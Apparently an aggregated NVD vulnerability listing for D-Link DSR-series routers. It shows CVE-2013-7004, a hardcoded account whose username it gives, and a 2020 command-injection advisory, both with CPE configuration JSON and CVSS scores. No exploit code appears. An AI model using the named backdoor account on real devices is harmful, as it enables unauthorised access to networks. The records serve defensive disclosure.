Vulnerabilities related to dlink - dsr-1000n
Vulnerability from fkie_nvd
Published
2013-12-19 04:24
Modified
2025-04-11 00:51
Severity ?
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
Impacted products
Vendor Product Version
dlink dsr-500_firmware *
dlink dsr-500_firmware 1.02b11
dlink dsr-500_firmware 1.02b25
dlink dsr-500_firmware 1.03b12
dlink dsr-500_firmware 1.03b23
dlink dsr-500_firmware 1.03b27
dlink dsr-500_firmware 1.03b36
dlink dsr-500_firmware 1.03b43
dlink dsr-500_firmware 1.04b58
dlink dsr-500_firmware 1.06b43
dlink dsr-500_firmware 1.06b53
dlink dsr-500 -
dlink dsr-150n_firmware *
dlink dsr-150n -
dlink dsr-250n_firmware *
dlink dsr-250n_firmware 1.01b46
dlink dsr-250n_firmware 1.01b56
dlink dsr-250n_firmware 1.05b20
dlink dsr-250n_firmware 1.05b53
dlink dsr-250n_firmware 1.08b31
dlink dsr-250n -
dlink dsr-150_firmware *
dlink dsr-150_firmware 1.05b29
dlink dsr-150_firmware 1.05b35
dlink dsr-150_firmware 1.05b46
dlink dsr-150_firmware 1.05b50
dlink dsr-150 -
dlink dsr-500n_firmware *
dlink dsr-500n_firmware 1.02b11
dlink dsr-500n_firmware 1.02b25
dlink dsr-500n_firmware 1.03b12
dlink dsr-500n_firmware 1.03b23
dlink dsr-500n_firmware 1.03b27
dlink dsr-500n_firmware 1.03b36
dlink dsr-500n_firmware 1.03b43
dlink dsr-500n_firmware 1.04b58
dlink dsr-500n_firmware 1.06b43
dlink dsr-500n_firmware 1.06b53
dlink dsr-500n -
dlink dsr-1000n_firmware *
dlink dsr-1000n_firmware 1.01b50
dlink dsr-1000n_firmware 1.02b11
dlink dsr-1000n_firmware 1.02b25
dlink dsr-1000n_firmware 1.03b12
dlink dsr-1000n_firmware 1.03b23
dlink dsr-1000n_firmware 1.03b27
dlink dsr-1000n_firmware 1.03b36
dlink dsr-1000n_firmware 1.03b43
dlink dsr-1000n_firmware 1.04b58
dlink dsr-1000n_firmware 1.06b43
dlink dsr-1000n_firmware 1.06b53
dlink dsr-1000n -
dlink dsr-250_firmware *
dlink dsr-250_firmware 1.01b46
dlink dsr-250_firmware 1.01b56
dlink dsr-250_firmware 1.05b20
dlink dsr-250_firmware 1.05b53
dlink dsr-250_firmware 1.08b31
dlink dsr-250 -
dlink dsr-1000_firmware *
dlink dsr-1000_firmware 1.01b50
dlink dsr-1000_firmware 1.02b11
dlink dsr-1000_firmware 1.02b25
dlink dsr-1000_firmware 1.03b12
dlink dsr-1000_firmware 1.03b23
dlink dsr-1000_firmware 1.03b27
dlink dsr-1000_firmware 1.03b36
dlink dsr-1000_firmware 1.03b43
dlink dsr-1000_firmware 1.04b58
dlink dsr-1000_firmware 1.06b43
dlink dsr-1000_firmware 1.06b53
dlink dsr-1000 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2616EA9D-842A-4C08-BEC0-DD0DE15627C4",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "86F457CD-2B3A-4571-941B-CEEAD52635C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "7D5FB42D-B664-4CD1-A9BE-BEEB3D2455F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "0836B735-04EB-46DA-A5FD-918CF254DC6D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "C40D5762-D950-4C59-8E60-AD63A5C4F43E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD052065-A62C-4E77-AF30-A7BFE87BEF0D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "84589477-A03F-4350-8F48-AA65A3E2F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "73B9957F-92B8-471A-90C1-541857228220",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "BB19EF7D-8CDD-4640-B272-2B31C6C8DC40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3DE0EAD-26FE-4A08-8B3F-94B7B46B3EE2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EEC400B-B9A7-4672-98BB-57EE722FDDBB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2655D2C-0A71-4F14-8CB6-9A8E5B0BA2D2",
              "versionEndIncluding": "1.05b48",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8875595-6A45-41F4-BD4F-88E4B01987FB",
              "versionEndIncluding": "1.08b39",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D87E55E-8FB9-46DD-B7E3-0FF5844AACCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
              "matchCriteriaId": "7054BD9D-2CBD-4EB2-A52C-6EAD0DF16CEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C7D6C20-02AB-45C2-8DF6-7406EF4B9E09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "20584156-C553-4AEA-A19C-A4BB67B5390A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
              "matchCriteriaId": "1CB44CCA-AC5E-4169-A4DA-8873C1435C04",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "83CA3AD5-8BB3-4C52-B1D4-57F24C7E3ECE",
              "versionEndIncluding": "1.08b29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
              "matchCriteriaId": "EDDC40C8-1BB2-4151-BAA4-E28C5AC94654",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
              "matchCriteriaId": "ADB61873-D7C7-400D-AAA3-5F65F459B573",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AD638F5-3A13-45D2-A343-1733611C5173",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "9A27097B-44CF-47FB-90D1-0D244209E9DC",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA8E760B-FBD1-4949-9E7C-35E216094B58",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "F0478AA5-8740-4458-855A-11804597FA6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6009D02-5CE9-4D08-8C6A-005F66ED8A29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DBC6011-8C8A-4EAA-8B6B-933C128E7A97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "540C7261-9352-4CF1-BCF8-13615EFB7C4E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "31C51D13-005D-4CB0-AB05-D38CC4E5096B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C3F3332-EEE2-492F-9585-62E4256ECBC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "0DE1C593-B0E7-4715-9AA5-CF7A3A87F05E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "2D4D1637-5291-45CD-BA6A-B71D9199F0F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "25136989-A83E-4C65-A354-8A0E2101EE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "36E387CF-AAE4-4EED-A7E2-6D2FE9B5933F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "289208CD-49AB-48A8-AD2E-BF4AFA479990",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "0FA9027F-9EBE-45FB-8128-E1E27F1B12EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "90E36C7E-02A1-4389-A706-B73D6C236E50",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "D5146B3C-CC4C-49C4-9B8B-BF9FC3E45293",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "79117184-9444-443B-9CF8-F4D2E19413A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "AD92EB60-B33E-4653-BE5B-449DC18E073F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAE86995-60E0-4F50-A008-EBB227CC4207",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B6BA51E-FCC6-4BCC-A4FF-AF49602C6D5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "484A7789-9A84-4E01-B7C8-97FC769D21AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "592C6173-8084-4857-AD6A-DDF9F66CE881",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8025D5C-331B-4A62-9A0D-29EA63E7AB30",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "2987ACFB-FE89-4901-8A64-B5B61F4D4EE1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F360917-0D86-4B7C-8699-EAE3A5155DAD",
              "versionEndIncluding": "1.08b39",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "91015BD6-F1EF-4E77-991E-5A895DF204FB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
              "matchCriteriaId": "36443128-6668-4FB6-9B96-1C695EB5B0BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
              "matchCriteriaId": "11E46972-D923-4AB7-BC2E-49D9DBC65202",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "71900351-AF65-4AFB-A77E-361075583F43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
              "matchCriteriaId": "0540F822-7F53-4282-A480-6E4A15994AF8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8A6B7598-20C1-4F1A-BFA8-16C66D210216",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F9A4E2D-8F74-4CD3-85F0-5DA4749B0F9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DA26493-2F60-41C1-9563-75FAA116DBA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D5BA908-B289-4917-8AE3-E57DACB93501",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B94BCF9-13FC-4930-92A4-6AF97699672B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "F1AED08D-47B4-4A13-8291-2E49AEB1B69F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "2904D8F1-633D-4DF8-9808-2961998CE510",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE195794-EDE9-477A-9934-8CE2ED1B19E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "BC8C2F15-6867-4647-9D2F-8F3D9F3054DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF08CD6-A360-4291-8159-DB2A07B8F2A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "DDDBCCF6-71B8-45A8-86C4-97B622793179",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF0BFC1A-B6DF-4D2E-9DD9-566E20CAD172",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username."
    },
    {
      "lang": "es",
      "value": "D-Link DSR-150 con firmware anterior a 1.08B44; DSR-150N con firmware anterior a 1.05B64; DSR-250 y DSR-250N con firmware anterior a 1.08B44; y DSR-500, DSR-500N, DSR-1000, y DSR-1000N con firmware anterior a 1.08B77 tienen incrustado el nombre de usuario gkJ9232xXyruTRmY, lo cual facilita a atacantes remotos obtener acceso aprovechando el conocimiento del nombre de usuario."
    }
  ],
  "id": "CVE-2013-7004",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 7.8,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-12-19T04:24:57.463",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-255"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-12-15 20:15
Modified
2024-11-21 05:18
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C5755D-5EB7-449E-81D9-20DBA0F36345",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3AE6313B-F71A-4AE4-8778-E30A93B1942B",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1ABEF03D-2411-4B84-BB67-831DC0164C9D",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "834CDDBF-DC00-40FD-86C1-9AF2A42BB317",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "64D78EB2-B98D-4196-B678-BF43227770F2",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A56B78EB-01FB-472A-B147-F2DF9E1C70E1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC42D575-0178-43EF-814F-DE6D738FB2A5",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC082E6B-E33F-4A69-A9B7-5E4D2D03C996",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "19A81670-E7DA-4179-A0A5-00938299BF6C",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
